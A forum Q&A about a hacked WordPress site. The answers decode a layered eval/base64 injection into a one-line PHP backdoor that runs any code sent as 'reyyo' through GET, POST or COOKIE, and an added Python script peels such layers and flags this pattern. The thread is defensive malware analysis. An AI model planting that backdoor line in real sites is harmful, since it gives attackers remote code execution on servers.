One of my friends' WordPress websites was hacked by someone, and they put the following code in the header of all template files.
I tried to decode it with a base64 decoder, but the output looks odd. Can you guys tell me what type of encoding this is?
It's a series of eval+base64 encryption. After decoding, the code would be:
if (isset($_REQUEST['r' . 'e' . 'y' . 'yo']))
eval(stripslashes($_REQUEST['r' . 'e' . 'y' . 'y' . 'o']));
Here's how I got that: use \/\*.*?\*\/ as the search pattern and replace with '' (empty string). Then look for the eval() statements and change those to echo. Basically this code will allow the attacker to inject and execute arbitrary code on your website.
Easiest way to do this is to remove all comments (/* */) with regex, and then replace eval() with echo(). Rinse and repeat.
After two or three loops, it outputs the following:
if(isset($_REQUEST['r'.'e'.'y'.'yo']))eval(stripslashes($_REQUEST['r'.'e'.'y'.'y'.'o']));
Which means that it will eval() anything passed as reyyo in either $_GET, $_POST or $_COOKIE.
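As an added example (not part of either answer), here is a Python script that automates the peel described above from the analyst's side: strip the /* */ comments, decode each eval(base64_decode()) layer, fold the 'r'.'e'.'y'.'yo' concatenation back into a single key, and flag code that passes request data to eval(). The nested sample is constructed here to mimic the layering the answers describe; the innermost line is the decoded backdoor quoted on this page.

```python
import base64
import re

# Constructed sample: the decoded backdoor line quoted in the answer, wrapped in
# two eval(base64_decode('...')) layers with /* */ comments, as the post describes.
BACKDOOR = "if(isset($_REQUEST['r'.'e'.'y'.'yo']))eval(stripslashes($_REQUEST['r'.'e'.'y'.'y'.'o']));"

def wrap(code: str) -> str:
    b64 = base64.b64encode(code.encode()).decode()
    return f"/*x*/eval(/*y*/base64_decode('{b64}')/*z*/);"

SAMPLE = wrap(wrap(BACKDOOR))

COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
LAYER_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)\s*;?")
CONCAT_RE = re.compile(r"'([^']*)'\s*\.\s*'([^']*)'")
INPUT_RE = re.compile(r"\beval\s*\(.*\$_(REQUEST|GET|POST|COOKIE)\b", re.S)

def peel(code: str, max_layers: int = 20):
    """Strip comments and decode eval(base64_decode()) layers until none remain.
    Returns (final code, number of layers removed); max_layers bounds the loop."""
    layers = 0
    while layers < max_layers:
        code = COMMENT_RE.sub("", code).strip()
        m = LAYER_RE.fullmatch(code)
        if not m:
            break
        code = base64.b64decode(m.group(1)).decode(errors="replace")
        layers += 1
    return code, layers

def fold_concat(code: str) -> str:
    """Join 'r'.'e'.'y'.'yo'-style concatenation into 'reyyo' so the key is greppable."""
    prev = None
    while prev != code:
        prev, code = code, CONCAT_RE.sub(lambda m: f"'{m.group(1)}{m.group(2)}'", code)
    return code

def analyse(code: str) -> dict:
    """Deobfuscate, normalise and flag eval() of request data (REQUEST/GET/POST/COOKIE)."""
    plain, layers = peel(code)
    plain = fold_concat(plain)
    m = INPUT_RE.search(plain)
    keys = re.findall(r"\$_(?:REQUEST|GET|POST|COOKIE)\['([^']+)'\]", plain)
    return {"layers": layers, "evals_user_input": bool(m),
            "source": m.group(1) if m else None, "keys": sorted(set(keys)), "code": plain}

if __name__ == "__main__":
    print(analyse(SAMPLE))
```

Run it over suspect template headers instead of SAMPLE; a result with evals_user_input set to True and a non-empty keys list is the signature the two answers describe.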